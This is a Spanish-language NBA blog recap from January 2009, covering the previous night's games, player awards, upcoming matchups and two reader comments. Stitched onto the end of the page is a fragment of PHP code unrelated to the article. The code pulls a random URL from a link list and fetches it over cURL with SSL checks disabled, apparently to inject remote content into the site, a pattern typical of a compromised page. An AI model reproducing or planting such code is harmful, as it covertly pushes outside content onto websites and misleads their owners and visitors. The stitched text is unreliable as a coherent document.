La Crónica (10/1/2009)

11 de January de 2009 por Jabho

No fue la de ayer una noche de anticipo de Play Offs precisamente y más bien fue una noche de equipos de loteria del draft.  Veamos el resumen en imágenes y seguimos:

Charlotte pudo con los Wizards que están completamente hundidos en el Este. Arenas desde su casa tendrá pánico a recuperarse viendo el panorama. En su ausencia Young se jugó un tiro que hubiera sido ganador. Mas que a lotería, a lo que van a aspirar los Wizards es al pick 1. Por los Bobcats los mejores fueron Bell y Diaw, así como destacar que Wallace no intentó ningún lanzamiento en los 20 minutos que jugó. 

Pregunta de trivial ¿cual es el equipo que lleva la mejor racha actualmente? Respuesta, los Wolves de McHale, Foye y Telafair… quién lo iba a decir cuando perdieron 13 o 14 seguidos hace poco. 5 seguidas y sumando. Anoche vencieron al 8º del Este, los Bucks, rozando el 60% en triples. Hablando de rookies Alexander sigue missing y minutos para rookies hay en los Bucks…

Más de lotería, y de pick alto, son los Thunder que siguen últimos de la NBA. Pero anoche ganaron a los Bulls. Van encontrando una rotación mas consistente estos Thunder y Krstic va cogiendo ritmo. Me mojo y digo que no acaban últimos de la liga. Los Bulls dado que las 7ª y 8ª del Este son baratitas pués siguen cerca. Gordon sigue jugando como si buscara un buen contrato, Rose no deslumbra como al principio y Hughes desde que le han colgado el cartel de transferible, si alguna vez no lo tuvo, esta jugando mejor.

Se quejaba D´Antoni de los malos porcentajes de sus jugadores. No quieres caldo, toma dos tazas. Anoche entre Knicks y Rockets tiraron 57 triples y anotaron 17. Pero los Rockets dominaron el rebote y estuvieron mas finos en los tiros de 2 y se llevaron el partido sin T-Mac ni Artest y con Mutombo animando en la banda. Los Knicks ya se sabe a que aspiran, los Rockets ni idea. El mejor del partido, el gran Scola.

Otros que no tuvieron la punteria fina fueron los Pistons en Sant Lake City. Y derrota claro. Los Jazz estan fuera de puestos de Play Offs con casi un 60% de victoria. A destacar que Millsap fue titular y no hizo dobles figuras. Les pasa a muchos pero él llevaba 19 partidos haciéndolas. Y Boozer, lesiones incluidas, ensayando el “show me the money”

Acabamos con la victoria de los Blazers a los Warriors en la vuelta de Roy trás la lesión. El balance de los Blazers sin Roy es 2-2 y la seguridad, por si había alguna duda, que en Rudy hay jugador. Anoche de nuevo estuvo bien y la de arena es lo poco y mal que está jugando Sergio.

PREMIOS

MVP: Para Kevin Durant habitual del premio al esfuerzo en vano. Anoche no lo fue y su equipo ganó, en la prórroga, a los Bulls con sus 28 puntos y 12 rebotes, además de 4 robos.

Rookie: Seguimos con los Thunder y nos quedamos con Westbrook que superó en su duelo a Rose con sus 14 puntos, 12 rebortes y 4 asistencias, a pesar de no estar bien en el tiro. 

La sorpresa: Rodney Carney llegó a los Wolves acompañado de dinero para que los SIxers tuvieran hueco para ofrecerle el máximo a Brand. No está contando mucho y su temporada es discreta siendo generosos. pero anoche anotó 22 puntos  con buenos porcentajes y tiros importantes en la victoria de su equipo.

La decepción: No es que jugaran partidos horribles pero Bucks y Bulls jugaron contra equipos peores, estan luchando por entrar en Play Off y ambos perdieron.

Mayor esfuerzo en Vano: Como cada noche no faltan candidatos como Gooden o Magette. Pero el premio va para los Bucks Jefferson &Redd y sus 61 puntos.

Paramos un minutito para ver las 5 mejores jugadas de anoche:

RAZONES PARA TRASNOCHAR

Las jornadas de domingo molan porque desde las 6:30 tenemos partidos. En concreto un interesante Celtics – Raptors  a ver quién está peor. Pero no es el partido destacado de la noche:

– Magic@Spurs

Partidazo en Texas donde un equipo con todo el respeto del mundo incluso cuando no está bien, los Spurs, se enfrentan a un equipo que parece diluido entre Cavs, Celtics o Lakers y reclama el respecto a base de ganar partidos, los Magic. Duelo además de titanes con dos colosos como Duncan y Howard, pasado y presente contra presente y futuro del dominio de las zonas… Dos ganadores que valoran tanto o mas defender su casa como atacar la del contrario. Eso si, para este partido si hay que trasnochar.

Los jugadores a seguir de cerca esta noche serán 2:

– Kobe Bryant y Dwyane Wade: Ambos están arriba en la lucha por el MVP final y ambos fueron de los mejores de la última jornada. Se enfrentan y conociéndolos seguro que en muchos momentos se defienden. Molan estos duelos.

La pregunta del día. Esta noche también juegan Pacers contra Warriors. Eso son 250 puntos o cerca. Pero ¿sirve de algo tirar tanto cuando se defiende tan poco (y estoy pensando más en los Warriors)?

 

Comenta

2 comentarios a esta entrada

  1. Txusma dice:
    #1

    Madre mía los Buls… 🙁

    ¿Habéis visto las estadisticas de Gerald Wallace esta noche? 21 minutos de juego y ningún intento de tiro…

      Citar

  2. RusticoColorao dice:
    #2

    Llevo unos días tragándome los partidos de los bulls…
    La derrota de ayer fue lamentable. Entre el penoso juego interior (nos robaron un montón de rebotes ofensivos) y la dirección del amigo VDN…
    No creo que Westbrook le ganase la partida a Rose, estuvo fallón

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>